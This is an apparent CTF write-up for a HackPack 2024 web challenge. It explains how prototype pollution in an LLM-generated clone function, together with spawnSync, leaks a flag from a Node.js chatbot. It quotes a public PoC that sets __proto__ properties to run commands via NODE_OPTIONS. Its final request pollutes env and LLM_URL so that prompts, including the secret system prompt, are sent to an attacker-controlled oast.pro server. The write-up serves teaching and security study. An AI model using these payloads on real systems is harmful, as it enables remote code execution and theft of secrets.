HackPack CTF 2024 LLM Edition - ask-me-anything

April 13, 2024

ask-me-a-question

This challenge was a WEB 450 points challenge of the HackPack 2024 CTF. The focus of this CTF was on exploiting LLM applications. However, this app could fit into most CTF formats, as the exploit iteslf does not correctly correlate with LLMs.

In my personal opinion the challenge is well done. The vulnerability is anchored in a real-world scenario with much research backing it up. The final payload is quite close to publicly available, copy-pastable, payloads. However, the CTF player still needs to understand the vulnerability in its core and make minor adjustments to get it to work.

Vulnerability Overview

The basics

The challenge environment contains two parts. A Python FastAPI webserver, and a node.js server on which we will focus on.

The web interface of the challenge provides us with very limited functionality. Overall, there is only one endpoint /ask, which allows us to send prompts to the application.

A typical prompt looks like the following:

Request

POST /ask HTTP/1.1
Host: localhost:1338
Content-Length: 51
Api-UserAgent: frontend/0.1alpha
sec-ch-ua: "Chromium";v="123", "Not:A-Brand";v="8"
Content-Type: application/json
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Origin: http://localhost:1338
Referer: http://localhost:1338/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

{"prompt":{"role":"user","content":"What is HTML"}}

Response

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Date: Sat, 13 Apr 2024 14:01:09 GMT
Content-Length: 1230

{"status":200,"message":"?\nAI: HTML is a markup language used to create content for the web. It stands for HyperText Markup Language.\nHuman: <snipped> each of these elements on the page.\nHuman: Wow, I had no idea! Can you teach me more about"}

The sink

Our goal is to get the flag. The flag hides within the defaultPrompt const which retrieves the flag from an environment variable. In order to get the flag we need to either:

Get access to the prmopts as they are sent to the LLM server (the app always sents all prompts to the server, but filters out the flag prompt)
An LLM answer which reflects the system question (which contains the flag), or reflects the flag in its’ answer
We need to be able to retrieve the flag from the node.js environment

const defaultPrompt = [
  {"role": "system", "content": `Blah Blah Blah '${process.env['FLAG']}'. Blah Blah Blah. You are a chatbot named Aanya.`},
  {"role": "user", "content": "Introduce yourself"},
  {"role": "assistant", "content":"I'm Aanya, and I am a online chatbot."},
];

The most promising sink is in the llm.js file, which sends all prompts to an URL which is retrieved from an environment variable of the process.

const LLM_URL = process.env['LLM_URL']
const resp = await fetch(LLM_URL, {
    method: 'POST',
    body: JSON.stringify({
        'messages': prompts
    }),
    headers: {
        "Content-Type": "application/json",
    }
});

It must be noted that the llm.js file is executed by the node.js app server. As can be seen in the following code snippet, the server executes a synchronus process (with spawnSync) with the following cmd line: node "llm.js" "system prompt with <flag>" "the other prompts".

function createArguments(fullPrompt) {
  let list = ['./llm.js', ];
  for(let i = 0; fullPrompt[i]; i++) {
    list.push(fullPrompt[i].role);
    list.push(fullPrompt[i].content);
  }
  return list;
}

const child =  spawnSync('node', createArguments(allPrompt), { encoding: 'utf-8', stdio: 'pipe' });

Exploitation

We are very limited in what we can submit to the challenge. There are multiple “prompt injection” sanitation routines. The following code snippet highlightes one routine. As can be seen, our “prompt request” can only contain the attribute role: user plus some other input validation.

function checkPromptInjection(prompt) {
  if ( typeof prompt !== 'object' ) {
    throw Error('Incorrect format specified');
  }

  if ( prompt.role !== 'user' ) {
    throw Error('Incorrect user specified');
  }

  if ( !/^[a-zA-Z0-9 ]+$/.test(prompt.content) ) {
    throw Error('Prompt injection detected');
  }

  if ( prompt.content.length > 40 ) {
    throw Error('Prompt is greater than 40 characters.')
  }

  if ( !allowedPrompts.includes(prompt.content) ) {
    throw Error('Prompt injection detected')
  }

  const safePromptData = clone({}, prompt, 5);
  return safePromptData;
}

The previous sanitation routine also contains a potential indicator for a JavaScript Prototype Polution vulnerability. Namely the following line:

const safePromptData = clone({}, prompt, 5);

If we investigate the clone function, we find that

it was created by a developer using a LLM prompt
the function recursively clones a JavaSript object As this clone function is called on a attacker-controlled prompt object, we are able to manipulate the prototype of the app server and inject attacker-controlled properties into the environment.

Prototype pollution vulnerabilities typically arise when a JavaScript function recursively merges an object containing user-controllable properties into an existing object https://portswigger.net/web-security/prototype-pollution

/*
  Prompt: 
  Generate a JS Function that clones a javascript object, 
  make sure to handle nested objects and nested array properly.
  Output (starts here):
  This function 'clone' creates a deep copy of a given object.
  It recursively iterates through the properties of the object,
  copying each property into a new object. If a property is an object itself,
  it recursively clones that object. If a property is an array, it creates
  a shallow copy of the array. Finally, it returns the cloned object.
*/
function clone(target, obj, depth) {
  
  if ( depth === 0 ) {
    return {};
  }

  // Iterate through each key in the original object
  for (const key in obj) {
    // Convert string key to integer if it's numeric
    const numericKey = /^\d+$/.test(key) ? parseInt(key) : key;
    // Check if the value associated with the key is an object
    if (typeof obj[numericKey] === 'object') {
      if ( !target[numericKey] ) {
        target[numericKey] = {};
      }
      // If the value is an object, recursively clone it
      target[numericKey] = clone(target[numericKey], obj[numericKey], depth - 1);
    } else if (Array.isArray(obj[numericKey])) {
      // If the value is an array, create a copy of the array
      target[numericKey] = obj[numericKey].slice();
    } else {
      // Otherwise, directly assign the value to the cloned object
      target[numericKey] = obj[numericKey];
    }
  }
  
  // Return the cloned object
  return target;
}

In practice, injecting a property called evilProperty is unlikely to have any effect. However, an attacker can use the same technique to pollute the prototype with properties that are used by the application, or any imported libraries. https://portswigger.net/web-security/prototype-pollution

First we test our thesis if prototype polution is possible. We inject a quick-and-dirty console.log(ppp). The property ppp does not exist and we get an error:

const safePrompt = checkPromptInjection(prompt);
console.log("000:"+ ppp +"000end");
let allPrompt = [];

alt text

Then we inject the property through prototype polution and check if everything is working correctly. As we can see, we successfully injected the property ppp into the node.js __proto__.

alt text

To exploit the prototype polution we need to find a property which we can manipulate, is not overwritten, and manipulating it has a security-relevant side-effect.

A popular prototype exploitation sink are calls to spawnSync. The library takes certain manipulatable properties which, when not specificaly set by a developer, are controllable by the attacker.

// Prototype polution due to `clone` function
const safePrompt = checkPromptInjection(prompt);

let allPrompt = [];
for(let i = 0; i < defaultPrompt.length; i++) {
    // Prototype polution due to `clone` function
    allPrompt.push(clone({}, defaultPrompt[i], 5));
}
// pusing the following arguments on a list `llm.js` `system prompt` `assistant prompt` `user prompt`
allPrompt.push(safePrompt);
// Spawning the `llm.js` script with the command
// `node "llm.js" "system prompt" "assistant prompt"` ...
const child =  spawnSync('node', createArguments(allPrompt), { encoding: 'utf-8', stdio: 'pipe' });

As seen in the following public PoC, the PoC makes use of several properties which an attacker can control. While this PoC is a good indication on how to exploit our CTF challenge, it does not run out of the box.

p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/spawnSync-environ').toString())//"}
p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = spawnSync('something');

We can try to inject some properties from the PoC and observe different error messages (please note that we needed to insert some custom console.log statements for the errors).

If we inject a "shell":"/proc/self/exe" property, we retrieve an error as the shell wants to call the llm.js, but without the node command.

alt text

If we inject a non-existant shell, we see how the process is spawned. Please note that the prompt containing the “flag” is passed as argument.

alt text

The PoC available on HackTricks expects that the victim calls spawnSync without any arguments. Therefore we need to adjust the PoC.

PoC expectation: spawnSync('node');
Our CTF call: spawnSync('node', arguments);

Within the LLM.js file we notice that the fetch call uses the variable LLM_URL to determine where to send our prompts to. Normally the LLM_URL would point to our python server which hosts our langchain HUGGINGFACE API.

However, if we have a look at the top of the file, we noticed that the scripts retrieves the LLM_URL from the process environment.

// LLM.js
const LLM_URL = process.env['LLM_URL']
const prompts = [];
[...]
const resp = await fetch(LLM_URL, {
    method: 'POST',
    body: JSON.stringify({
        'messages': prompts
    }),
    headers: {
        "Content-Type": "application/json",
    }
});

Knowing that the LLM_URL is controlled by the process environment is great news. If we check the previous HackTricks PoC, we notice that it also utilises the env to exploit spawnSync.

p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/spawnSync-environ').toString())//"}

If we have a look at the spawnSync call, we can also see that no explicity env is passed by the developer to the process. Lets attempt to overwrite the env of the LLM.js process and control the LLM_URL url.

For a successful exploit we first set the env property to make sure it is empty. Afterwards we set the LLM_URL property with an attacker-controlled URL.

When we spawn the process the LLM_URL will already be set to our attacker-controlled webserver. The llm.js script will attempt to overwrite the LLM_URL by retrieving it from the process environment. However, as the environment is empty, this fails.

In result, the fetch call in the llm.js will send all prompts, including the system prompt with the flag, to our attacker-controlled interact.sh server.

POST /ask HTTP/1.1
Host: localhost:1338
Content-Length: 159
Api-UserAgent: frontend/0.1alpha
sec-ch-ua: "Chromium";v="123", "Not:A-Brand";v="8"
Content-Type: application/json
Connection: close

{"prompt":{"role":"user","content":"What is HTML",
"__proto__":{"ppp":"testppp","env":{},
"LLM_URL":"http://codpf2tu49utntqv3a6g4noqs6o3y6ijf.oast.pro/"}
}}

alt text

The request body contains our flag and we successfully solved the CTF. Sadly, as you might have noticed in the timestamp, we solved the challenge 6 minutes too late and did not recieve any points…